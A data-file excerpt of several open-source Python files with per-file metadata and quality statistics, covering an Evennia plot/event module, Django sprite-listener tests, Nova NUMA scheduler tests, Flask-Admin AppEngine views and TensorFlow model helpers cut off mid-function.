| 0.243478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 165
| 8
| 59
| 20.625
| 0.804196
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.333333
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8a12f1a65d5f3d6c4217d9aaf1142a51fb52bc1a
| 2,260
|
py
|
Python
|
athanor_rplogger/gamedb.py
|
volundmush/athanor_rplogger
|
05bdce1596c90902bc71e1c3a5b325852bd47702
|
[
"BSD-3-Clause"
] | null | null | null |
athanor_rplogger/gamedb.py
|
volundmush/athanor_rplogger
|
05bdce1596c90902bc71e1c3a5b325852bd47702
|
[
"BSD-3-Clause"
] | null | null | null |
athanor_rplogger/gamedb.py
|
volundmush/athanor_rplogger
|
05bdce1596c90902bc71e1c3a5b325852bd47702
|
[
"BSD-3-Clause"
] | null | null | null |
import re
from evennia.utils.ansi import ANSIString
from athanor.gamedb.scripts import AthanorOptionScript
from athanor.gamedb.models import PlotBridge, EventBridge
class AthanorPlot(AthanorOptionScript):
re_name = re.compile(r"")
lockstring = ""
def create_bridge(self, key, clean_key):
if hasattr(self, 'plot_bridge'):
return
bridge, created = PlotBridge.objects.get_or_create(db_script=self, db_name=clean_key,
db_iname=clean_key.lower(), db_cname=key)
if created:
bridge.save()
def setup_locks(self):
self.locks.add(self.lockstring)
@classmethod
def create_plot(cls, key, **kwargs):
key = ANSIString(key)
clean_key = str(key.clean())
if '|' in clean_key:
raise ValueError("Malformed ANSI in Plot Name.")
if PlotBridge.objects.filter(db_iname=clean_key.lower()).count():
raise ValueError("Name conflicts with another Plot.")
script, errors = cls.create(clean_key, **kwargs)
if script:
script.create_bridge(key, clean_key)
script.setup_locks()
return script
class AthanorEvent(AthanorOptionScript):
re_name = re.compile(r"")
lockstring = ""
def create_bridge(self, key, clean_key):
if hasattr(self, 'event_bridge'):
return
bridge, created = EventBridge.objects.get_or_create(db_script=self, db_name=clean_key,
db_iname=clean_key.lower(), db_cname=key)
if created:
bridge.save()
def setup_locks(self):
self.locks.add(self.lockstring)
@classmethod
def create_event(cls, key, **kwargs):
key = ANSIString(key)
clean_key = str(key.clean())
if '|' in clean_key:
raise ValueError("Malformed ANSI in Plot Name.")
if PlotBridge.objects.filter(db_iname=clean_key.lower()).count():
raise ValueError("Name conflicts with another Plot.")
script, errors = cls.create(clean_key, **kwargs)
if script:
script.create_bridge(key, clean_key)
script.setup_locks()
return script
| 32.753623
| 101
| 0.609292
| 261
| 2,260
| 5.10728
| 0.226054
| 0.096024
| 0.049512
| 0.045011
| 0.8012
| 0.8012
| 0.8012
| 0.8012
| 0.8012
| 0.8012
| 0
| 0
| 0.290265
| 2,260
| 68
| 102
| 33.235294
| 0.831047
| 0
| 0
| 0.777778
| 0
| 0
| 0.065102
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.074074
| 0
| 0.37037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a30b4d5e1ff531d15285aae1b1900d25966201e
| 4,960
|
py
|
Python
|
tests/tests/test_listener.py
|
litchfield/django-dynamic-sprites
|
a369221a6a33c40b0b9c8590ce1b3023a644a26c
|
[
"BSD-3-Clause"
] | 4
|
2015-09-23T07:45:11.000Z
|
2021-12-27T07:21:48.000Z
|
tests/tests/test_listener.py
|
litchfield/django-dynamic-sprites
|
a369221a6a33c40b0b9c8590ce1b3023a644a26c
|
[
"BSD-3-Clause"
] | 3
|
2020-02-11T21:07:29.000Z
|
2021-06-10T17:22:57.000Z
|
tests/tests/test_listener.py
|
litchfield/django-dynamic-sprites
|
a369221a6a33c40b0b9c8590ce1b3023a644a26c
|
[
"BSD-3-Clause"
] | 2
|
2016-04-09T05:14:30.000Z
|
2019-06-01T05:13:41.000Z
|
# coding: utf8
import os
from django.conf import settings
from django.db.models.signals import post_save
from django.test import TestCase
from dynamic_sprites.image import Image
from dynamic_sprites.listeners import ModelSpriteListener
from tests.models import Country
class ModelSpriteListenerSavingAnObjectInQuerysetTestCase(object):
    """Saving a Country matched by the listener's queryset should regenerate
    both the sprite image and its accompanying CSS file.

    NOTE(review): this class inherits from ``object`` rather than
    ``django.test.TestCase``, so the test runner never collects it —
    presumably disabled on purpose; confirm before re-enabling.
    """

    def setUp(self):
        # Connect a sprite listener bound to the full Country queryset, then
        # save a country so the post_save signal fires and the sprite is built.
        self.name = 'listener-sprite'
        listener = ModelSpriteListener(
            name=self.name,
            queryset=Country.objects.all(),
            image_field='flag',
            slug_field='slug',
        )
        post_save.connect(listener, sender=Country)
        self.new_country = Country(
            name="Canada",
            flag='country/flags/can.png',
            slug='canada'
        )
        self.new_country.save()
        # Paths where the listener is expected to write its output.
        self.image_path = os.path.join(settings.MEDIA_ROOT, self.name + ".png")
        self.css_path = os.path.join(settings.MEDIA_ROOT, self.name + ".css")

    def tearDown(self):
        # Remove the saved record and any generated sprite artifacts.
        self.new_country.delete()
        if os.path.exists(self.image_path):
            os.remove(self.image_path)
        if os.path.exists(self.css_path):
            os.remove(self.css_path)

    def test_saving_an_object_creates_a_new_sprite_image(self):
        self.assertTrue(os.path.exists(self.image_path))

    def test_saving_an_object_creates_a_new_sprite_image_with_the_objects_image_dimensions(self):
        # 48x48 presumably matches the can.png fixture dimensions — TODO confirm.
        image = Image(self.image_path)
        self.assertEqual(48, image.width)
        self.assertEqual(48, image.height)

    def test_saving_an_object_creates_a_new_sprite_css(self):
        self.assertTrue(os.path.exists(self.css_path))

    def test_saving_an_object_creates_a_new_sprite_css_with_the_expected_style(self):
        with open(self.css_path, 'r') as f:
            css = f.read()
        # ``basestring`` is Python 2 only; this would NameError on Python 3.
        self.assertTrue(isinstance(css, basestring))
        self.assertIn('.sprite-%s' % self.name, css)
        self.assertIn('.sprite-%s-%s{background-position:-0px -0px}' % (self.name, self.new_country.slug), css)
class ModelSpriteListenerUnderstandsQuerysetFromInstanceTestCase(TestCase):
    """A listener created without an explicit queryset must still generate
    the sprite image and CSS when a matching model instance is saved."""

    def setUp(self):
        self.name = 'listener-sprite'
        # No ``queryset`` argument here: the listener has to derive it from
        # the saved instance itself.
        post_save.connect(
            ModelSpriteListener(
                name=self.name,
                image_field='flag',
                slug_field='slug',
            ),
            sender=Country,
        )
        self.new_country = Country(
            name="Canada",
            flag='country/flags/can.png',
            slug='canada',
        )
        self.new_country.save()
        base = os.path.join(settings.MEDIA_ROOT, self.name)
        self.image_path = base + ".png"
        self.css_path = base + ".css"

    def tearDown(self):
        self.new_country.delete()
        for generated in (self.image_path, self.css_path):
            if os.path.exists(generated):
                os.remove(generated)

    def test_saving_an_object_creates_a_new_sprite_image(self):
        self.assertTrue(os.path.exists(self.image_path))

    def test_saving_an_object_creates_a_new_sprite_image_with_the_objects_image_dimensions(self):
        sprite = Image(self.image_path)
        self.assertEqual(48, sprite.width)
        self.assertEqual(48, sprite.height)

    def test_saving_an_object_creates_a_new_sprite_css(self):
        self.assertTrue(os.path.exists(self.css_path))

    def test_saving_an_object_creates_a_new_sprite_css_with_the_expected_style(self):
        with open(self.css_path, 'r') as css_file:
            css = css_file.read()
        self.assertTrue(isinstance(css, basestring))
        self.assertIn('.sprite-%s' % self.name, css)
        self.assertIn('.sprite-%s-%s{background-position:-0px -0px}' % (self.name, self.new_country.slug), css)
class ModelSpriteListenerSavingAnObjectNotInQuerysetTestCase(object):
    """Saving a Country that the listener's queryset excludes must not
    generate any sprite output.

    NOTE(review): inherits from ``object`` rather than ``TestCase``, so the
    runner does not collect it — presumably disabled on purpose; confirm.
    """

    def setUp(self):
        # The listener is restricted to slug='brazil'; saving 'canada' below
        # should therefore NOT trigger sprite generation.
        self.name = 'listener-sprite'
        listener = ModelSpriteListener(
            name=self.name,
            queryset=Country.objects.filter(slug='brazil'),
            image_field='flag',
            slug_field='slug',
        )
        post_save.connect(listener, sender=Country)
        self.new_country = Country(
            name="Canada",
            flag='country/flags/can.png',
            slug='canada'
        )
        self.new_country.save()
        # Paths the listener would write to if it (incorrectly) fired.
        self.image_path = os.path.join(settings.MEDIA_ROOT, self.name + ".png")
        self.css_path = os.path.join(settings.MEDIA_ROOT, self.name + ".css")

    def tearDown(self):
        self.new_country.delete()
        if os.path.exists(self.image_path):
            os.remove(self.image_path)
        if os.path.exists(self.css_path):
            os.remove(self.css_path)

    def test_saving_an_object_that_is_not_in_queryset_dont_create_image(self):
        self.assertFalse(os.path.exists(self.image_path))

    def test_saving_an_object_that_is_not_in_queryset_dont_create_css(self):
        self.assertFalse(os.path.exists(self.css_path))
| 36.20438
| 111
| 0.663508
| 636
| 4,960
| 4.921384
| 0.143082
| 0.034505
| 0.058147
| 0.061342
| 0.86262
| 0.86262
| 0.860383
| 0.843131
| 0.843131
| 0.843131
| 0
| 0.003385
| 0.225605
| 4,960
| 136
| 112
| 36.470588
| 0.811507
| 0.002419
| 0
| 0.8
| 0
| 0
| 0.062273
| 0.028104
| 0
| 0
| 0
| 0
| 0.145455
| 1
| 0.145455
| false
| 0
| 0.063636
| 0
| 0.236364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a842a925fa0fb63515c381263b512776fbe4d7e
| 7,642
|
py
|
Python
|
nova/tests/unit/scheduler/filters/test_numa_topology_filters.py
|
jamielennox/nova
|
ef42f74a07b6a96252f91f1755631ddc314a3b2f
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/scheduler/filters/test_numa_topology_filters.py
|
jamielennox/nova
|
ef42f74a07b6a96252f91f1755631ddc314a3b2f
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/scheduler/filters/test_numa_topology_filters.py
|
jamielennox/nova
|
ef42f74a07b6a96252f91f1755631ddc314a3b2f
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_serialization import jsonutils
from nova import objects
from nova.objects import base as obj_base
from nova.scheduler.filters import numa_topology_filter
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.scheduler import fakes
class TestNUMATopologyFilter(test.NoDBTestCase):
    """Unit tests for the scheduler ``NUMATopologyFilter``.

    Each test builds a fake instance (optionally carrying an
    ``InstanceNUMATopology``) plus a fake host, then checks whether the
    filter accepts the host and what it records on
    ``host.instance_numa_topology`` / ``host.limits``.  The previously
    copy-pasted instance and request-spec construction is factored into
    private helpers; every assertion is unchanged.
    """

    def setUp(self):
        super(TestNUMATopologyFilter, self).setUp()
        self.filt_cls = numa_topology_filter.NUMATopologyFilter()

    @staticmethod
    def _two_cell_topology():
        # Baseline request used by most tests: two cells, one CPU and
        # 512 MB each.
        return objects.InstanceNUMATopology(
            cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
                   objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
                   ])

    @staticmethod
    def _make_instance(instance_topology):
        # Fake instance carrying the given NUMA topology (may be None).
        instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
        instance.numa_topology = instance_topology
        return instance

    @staticmethod
    def _filter_properties(instance):
        # Serialize the instance into the request_spec dict shape the
        # filter reads its NUMA constraints from.
        return {
            'request_spec': {
                'instance_properties': jsonutils.to_primitive(
                    obj_base.obj_to_primitive(instance))}}

    def test_numa_topology_filter_pass(self):
        instance = self._make_instance(self._two_cell_topology())
        filter_properties = self._filter_properties(instance)
        host = fakes.FakeHostState('host1', 'node1',
                                   {'numa_topology': fakes.NUMA_TOPOLOGY,
                                    'pci_stats': None})
        self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
        self.assertIsInstance(host.instance_numa_topology,
                              objects.InstanceNUMATopology)

    def test_numa_topology_filter_numa_instance_no_numa_host_fail(self):
        # Host reports no NUMA topology at all -> cannot satisfy the request.
        instance = self._make_instance(self._two_cell_topology())
        filter_properties = self._filter_properties(instance)
        host = fakes.FakeHostState('host1', 'node1', {'pci_stats': None})
        self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
        self.assertIsNone(host.instance_numa_topology)

    def test_numa_topology_filter_numa_host_no_numa_instance_pass(self):
        # An instance without NUMA constraints passes and records nothing.
        instance = self._make_instance(None)
        filter_properties = self._filter_properties(instance)
        host = fakes.FakeHostState('host1', 'node1',
                                   {'numa_topology': fakes.NUMA_TOPOLOGY})
        self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
        self.assertIsNone(host.instance_numa_topology)

    def test_numa_topology_filter_fail_fit(self):
        # Three requested cells do not fit the fake host topology.
        instance_topology = objects.InstanceNUMATopology(
            cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
                   objects.InstanceNUMACell(id=1, cpuset=set([2]), memory=512),
                   objects.InstanceNUMACell(id=2, cpuset=set([3]), memory=512)
                   ])
        instance = self._make_instance(instance_topology)
        filter_properties = self._filter_properties(instance)
        host = fakes.FakeHostState('host1', 'node1',
                                   {'numa_topology': fakes.NUMA_TOPOLOGY,
                                    'pci_stats': None})
        self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
        self.assertIsNone(host.instance_numa_topology)

    def test_numa_topology_filter_fail_memory(self):
        # With no RAM overcommit a 1024 MB cell is expected to exceed the
        # fake host's per-cell memory (see fakes.NUMA_TOPOLOGY).
        self.flags(ram_allocation_ratio=1)
        instance_topology = objects.InstanceNUMATopology(
            cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]),
                                            memory=1024),
                   objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
                   ])
        instance = self._make_instance(instance_topology)
        filter_properties = self._filter_properties(instance)
        host = fakes.FakeHostState('host1', 'node1',
                                   {'numa_topology': fakes.NUMA_TOPOLOGY,
                                    'pci_stats': None})
        self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
        self.assertIsNone(host.instance_numa_topology)

    def test_numa_topology_filter_fail_cpu(self):
        # With no CPU overcommit a 3-CPU cell is expected to exceed the
        # fake host's per-cell CPUs.
        self.flags(cpu_allocation_ratio=1)
        instance_topology = objects.InstanceNUMATopology(
            cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
                   objects.InstanceNUMACell(id=1, cpuset=set([3, 4, 5]),
                                            memory=512)])
        instance = self._make_instance(instance_topology)
        filter_properties = self._filter_properties(instance)
        host = fakes.FakeHostState('host1', 'node1',
                                   {'numa_topology': fakes.NUMA_TOPOLOGY,
                                    'pci_stats': None})
        self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
        self.assertIsNone(host.instance_numa_topology)

    def test_numa_topology_filter_pass_set_limit(self):
        # A passing host should record the configured allocation ratios as
        # limits for the subsequent claim.
        self.flags(cpu_allocation_ratio=21)
        self.flags(ram_allocation_ratio=1.3)
        instance = self._make_instance(self._two_cell_topology())
        filter_properties = self._filter_properties(instance)
        host = fakes.FakeHostState('host1', 'node1',
                                   {'numa_topology': fakes.NUMA_TOPOLOGY,
                                    'pci_stats': None})
        self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
        self.assertIsInstance(host.instance_numa_topology,
                              objects.InstanceNUMATopology)
        limits = host.limits['numa_topology']
        self.assertEqual(limits.cpu_allocation_ratio, 21)
        self.assertEqual(limits.ram_allocation_ratio, 1.3)
| 48.987179
| 79
| 0.633735
| 808
| 7,642
| 5.738861
| 0.165842
| 0.093164
| 0.060384
| 0.028682
| 0.796636
| 0.779168
| 0.746172
| 0.746172
| 0.746172
| 0.746172
| 0
| 0.017266
| 0.272442
| 7,642
| 155
| 80
| 49.303226
| 0.816727
| 0.071447
| 0
| 0.726563
| 0
| 0
| 0.061008
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.0625
| false
| 0.078125
| 0.0625
| 0
| 0.132813
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
8a99c11aae94f7a188468f6d77ecf58eda6b315e
| 224
|
py
|
Python
|
flambe/nlp/__init__.py
|
ethan-asapp/flambe
|
70257167058c7b82ee39f74167a6161bd264ad18
|
[
"MIT"
] | 148
|
2019-08-29T21:19:03.000Z
|
2022-03-18T06:13:53.000Z
|
flambe/nlp/__init__.py
|
cle-ros/flambe
|
0dc2f5b2b286694defe8abf450fe5be9ae12c097
|
[
"MIT"
] | 108
|
2019-09-03T14:36:10.000Z
|
2020-05-13T15:53:14.000Z
|
flambe/nlp/__init__.py
|
cle-ros/flambe
|
0dc2f5b2b286694defe8abf450fe5be9ae12c097
|
[
"MIT"
] | 21
|
2019-09-08T14:09:45.000Z
|
2020-12-27T04:12:33.000Z
|
from flambe.nlp import language_modeling
from flambe.nlp import classification
from flambe.nlp import fewshot
from flambe.nlp import transformers
__all__ = ['language_modeling', 'classification', 'fewshot', 'transformers']
| 32
| 76
| 0.816964
| 27
| 224
| 6.555556
| 0.37037
| 0.225989
| 0.293785
| 0.429379
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102679
| 224
| 6
| 77
| 37.333333
| 0.880597
| 0
| 0
| 0
| 0
| 0
| 0.223214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8aa0c663c05aa4279f5bf12c21fb384a4523da40
| 4,459
|
py
|
Python
|
flask_admin/contrib/appengine/view.py
|
gstf/flask-admin
|
5f1b2d8813c7aa048862a820d17a6efbeba8c42f
|
[
"BSD-3-Clause"
] | 1
|
2019-04-13T20:53:16.000Z
|
2019-04-13T20:53:16.000Z
|
flask_admin/contrib/appengine/view.py
|
gstf/flask-admin
|
5f1b2d8813c7aa048862a820d17a6efbeba8c42f
|
[
"BSD-3-Clause"
] | null | null | null |
flask_admin/contrib/appengine/view.py
|
gstf/flask-admin
|
5f1b2d8813c7aa048862a820d17a6efbeba8c42f
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from flask_admin.model import BaseModelView
from wtforms_appengine import db as wt_db
from wtforms_appengine import ndb as wt_ndb
from google.appengine.ext import db
from google.appengine.ext import ndb
class NdbModelView(BaseModelView):
    """
    AppEngine NDB model scaffolding.
    """
    # NOTE(review): relies on Python 2 idioms (``dict.iteritems``) and the
    # legacy google.appengine SDK; not Python 3 compatible as written.

    def get_pk_value(self, model):
        # The urlsafe key string doubles as the primary key in admin URLs.
        return model.key.urlsafe()

    def scaffold_list_columns(self):
        # All NDB property attribute names on the model, sorted.
        return sorted([k for (k, v) in self.model.__dict__.iteritems() if isinstance(v, ndb.Property)])

    def scaffold_sortable_columns(self):
        # Only indexed properties can participate in NDB sort orders.
        return [k for (k, v) in self.model.__dict__.iteritems() if isinstance(v, ndb.Property) and v._indexed]

    def init_search(self):
        # Search is not supported for NDB models.
        return None

    def is_valid_filter(self):
        pass

    def scaffold_filters(self):
        #TODO: implement
        pass

    def scaffold_form(self):
        # Build a WTForms form class from a fresh model instance.
        return wt_ndb.model_form(self.model())

    def get_list(self, page, sort_field, sort_desc, search, filters):
        """Return ``(total_count, results)`` for one admin list page."""
        #TODO: implement filters (don't think search can work here)
        q = self.model.query()
        if sort_field:
            order_field = getattr(self.model, sort_field)
            if sort_desc:
                # Negating an NDB property expresses descending order.
                order_field = -order_field
            q = q.order(order_field)
        results = q.fetch(self.page_size, offset=page*self.page_size)
        return q.count(), results

    def get_one(self, urlsafe_key):
        # Inverse of get_pk_value: decode the urlsafe key and fetch.
        return ndb.Key(urlsafe=urlsafe_key).get()

    def create_model(self, form):
        """Create a new record from *form*; return True on success."""
        try:
            model = self.model()
            form.populate_obj(model)
            model.put()
            return True
        except Exception as ex:
            if not self.handle_view_exception(ex):
                #flash(gettext('Failed to create record. %(error)s',
                #    error=ex), 'error')
                logging.exception('Failed to create record.')
            return False

    def update_model(self, form, model):
        """Apply *form* to an existing record; return True on success."""
        try:
            form.populate_obj(model)
            model.put()
            return True
        except Exception as ex:
            if not self.handle_view_exception(ex):
                #flash(gettext('Failed to update record. %(error)s',
                #    error=ex), 'error')
                logging.exception('Failed to update record.')
            return False

    def delete_model(self, model):
        """Delete a record by its key; return True on success."""
        try:
            model.key.delete()
            return True
        except Exception as ex:
            if not self.handle_view_exception(ex):
                #flash(gettext('Failed to delete record. %(error)s',
                #    error=ex),
                #    'error')
                logging.exception('Failed to delete record.')
            return False
class DbModelView(BaseModelView):
    """
    AppEngine DB model scaffolding.
    """
    # NOTE(review): mirrors NdbModelView for the older google.appengine db
    # API; Python 2 only (``dict.iteritems``).

    def get_pk_value(self, model):
        # str(key) yields the encoded key used as the admin primary key.
        return str(model.key())

    def scaffold_list_columns(self):
        # All db property attribute names on the model, sorted.
        return sorted([k for (k, v) in self.model.__dict__.iteritems() if isinstance(v, db.Property)])

    def scaffold_sortable_columns(self):
        # Only indexed properties can participate in db sort orders.
        return [k for (k, v) in self.model.__dict__.iteritems() if isinstance(v, db.Property) and v._indexed]

    def init_search(self):
        # Search is not supported for db models.
        return None

    def is_valid_filter(self):
        pass

    def scaffold_filters(self):
        #TODO: implement
        pass

    def scaffold_form(self):
        # Build a WTForms form class from a fresh model instance.
        return wt_db.model_form(self.model())

    def get_list(self, page, sort_field, sort_desc, search, filters):
        """Return ``(total_count, results)`` for one admin list page."""
        #TODO: implement filters (don't think search can work here)
        q = self.model.all()
        if sort_field:
            if sort_desc:
                # The db API expresses descending order via a "-" prefix.
                sort_field = "-" + sort_field
            q.order(sort_field)
        results = q.fetch(self.page_size, offset=page*self.page_size)
        return q.count(), results

    def get_one(self, encoded_key):
        # Inverse of get_pk_value: decode and fetch the entity.
        return db.get(db.Key(encoded=encoded_key))

    def create_model(self, form):
        """Create a new record from *form*; return True on success."""
        try:
            model = self.model()
            form.populate_obj(model)
            model.put()
            return True
        except Exception as ex:
            if not self.handle_view_exception(ex):
                #flash(gettext('Failed to create record. %(error)s',
                #    error=ex), 'error')
                logging.exception('Failed to create record.')
            return False

    def update_model(self, form, model):
        """Apply *form* to an existing record; return True on success."""
        try:
            form.populate_obj(model)
            model.put()
            return True
        except Exception as ex:
            if not self.handle_view_exception(ex):
                #flash(gettext('Failed to update record. %(error)s',
                #    error=ex), 'error')
                logging.exception('Failed to update record.')
            return False

    def delete_model(self, model):
        """Delete a record; return True on success."""
        try:
            model.delete()
            return True
        except Exception as ex:
            if not self.handle_view_exception(ex):
                #flash(gettext('Failed to delete record. %(error)s',
                #    error=ex),
                #    'error')
                logging.exception('Failed to delete record.')
            return False
def ModelView(model):
    """Return the admin view appropriate for *model*'s AppEngine base class.

    NDB models get an ``NdbModelView``, legacy db models a ``DbModelView``;
    anything else raises ``ValueError``.
    """
    if issubclass(model, ndb.Model):
        return NdbModelView(model)
    if issubclass(model, db.Model):
        return DbModelView(model)
    raise ValueError("Unsupported model: %s" % model)
| 24.910615
| 104
| 0.708455
| 652
| 4,459
| 4.693252
| 0.162577
| 0.044118
| 0.031373
| 0.04902
| 0.807843
| 0.777124
| 0.777124
| 0.777124
| 0.777124
| 0.748366
| 0
| 0
| 0.172909
| 4,459
| 178
| 105
| 25.050562
| 0.829718
| 0.142857
| 0
| 0.694915
| 0
| 0
| 0.043846
| 0
| 0
| 0
| 0
| 0.011236
| 0
| 1
| 0.211864
| false
| 0.033898
| 0.050847
| 0.101695
| 0.516949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
76df1acd55ffa358b6adc4a7643e7bcfce35c032
| 37,598
|
py
|
Python
|
tensorflow_/tensorflowcv/models/common.py
|
nalbwa/imgclsmob
|
a564dbf28f74ca94594426ac93f6143a74e490ec
|
[
"MIT"
] | 1
|
2019-12-23T04:36:46.000Z
|
2019-12-23T04:36:46.000Z
|
tensorflow_/tensorflowcv/models/common.py
|
nalbwa/imgclsmob
|
a564dbf28f74ca94594426ac93f6143a74e490ec
|
[
"MIT"
] | null | null | null |
tensorflow_/tensorflowcv/models/common.py
|
nalbwa/imgclsmob
|
a564dbf28f74ca94594426ac93f6143a74e490ec
|
[
"MIT"
] | null | null | null |
"""
Common routines for models in TensorFlow.
"""
__all__ = ['is_channels_first', 'get_channel_axis', 'flatten', 'batchnorm', 'maxpool2d', 'avgpool2d', 'conv2d',
'conv1x1', 'conv3x3', 'depthwise_conv3x3', 'conv_block', 'conv1x1_block', 'conv3x3_block', 'conv7x7_block',
'dwconv3x3_block', 'dwconv5x5_block', 'pre_conv_block', 'pre_conv1x1_block', 'pre_conv3x3_block', 'se_block',
'channel_shuffle', 'channel_shuffle2']
import math
import numpy as np
import tensorflow as tf
def get_activation_layer(x,
                         activation,
                         name="activ"):
    """
    Create activation layer from string/function.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    activation : function or str
        Activation function or name of activation function.
    name : str, default 'activ'
        Block name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    assert (activation is not None)
    # Callables are applied directly; only string names are dispatched here.
    if not isinstance(activation, str):
        return activation(x)
    if activation == "relu":
        return tf.nn.relu(x, name=name)
    if activation == "relu6":
        return tf.nn.relu6(x, name=name)
    raise NotImplementedError()
def is_channels_first(data_format):
    """
    Check whether the supplied data format denotes channels-first (NCHW)
    tensor layout.

    Parameters:
    ----------
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.

    Returns
    -------
    bool
        A flag.
    """
    return "channels_first" == data_format
def get_channel_axis(data_format):
    """
    Resolve the index of the channel axis for the given data format.

    Parameters:
    ----------
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.

    Returns
    -------
    int
        Channel axis.
    """
    # Axis 1 for NCHW; the trailing axis (-1) otherwise.
    if is_channels_first(data_format):
        return 1
    return -1
def flatten(x,
            data_format):
    """
    Flattens the input to two dimensional.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    if not is_channels_first(data_format):
        # Move channels before the spatial dims first so the flattened
        # element order matches the channels-first layout.
        x = tf.transpose(x, perm=(0, 3, 1, 2))
    flat_size = np.prod(x.get_shape().as_list()[1:])
    return tf.reshape(x, shape=(-1, flat_size))
def batchnorm(x,
              momentum=0.9,
              epsilon=1e-5,
              training=False,
              data_format="channels_last",
              name=None):
    """
    Batch normalization layer.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    momentum : float, default 0.9
        Momentum for the moving average.
    epsilon : float, default 1e-5
        Small float added to variance to avoid dividing by zero.
    training : bool, or a TensorFlow boolean scalar tensor, default False
        Whether to return the output in training mode or in inference mode.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default None
        Layer name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    bn_layer = tf.keras.layers.BatchNormalization(
        axis=get_channel_axis(data_format),
        momentum=momentum,
        epsilon=epsilon,
        name=name)
    return bn_layer(inputs=x, training=training)
def maxpool2d(x,
              pool_size,
              strides,
              padding=0,
              ceil_mode=False,
              data_format="channels_last",
              name=None):
    """
    Max pooling operation for two dimensional (spatial) data.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    pool_size : int or tuple/list of 2 int
        Size of the max pooling windows.
    strides : int or tuple/list of 2 int
        Strides of the pooling.
    padding : int or tuple/list of 2 int, default 0
        Padding value for convolution layer.
    ceil_mode : bool, default False
        When `True`, will use ceil instead of floor to compute the output shape.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default None
        Layer name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    # Normalize scalar arguments to (h, w) pairs.
    if isinstance(pool_size, int):
        pool_size = (pool_size, pool_size)
    if isinstance(strides, int):
        strides = (strides, strides)
    if isinstance(padding, int):
        padding = (padding, padding)
    if ceil_mode:
        # Grow the padding by one whenever floor division would drop a
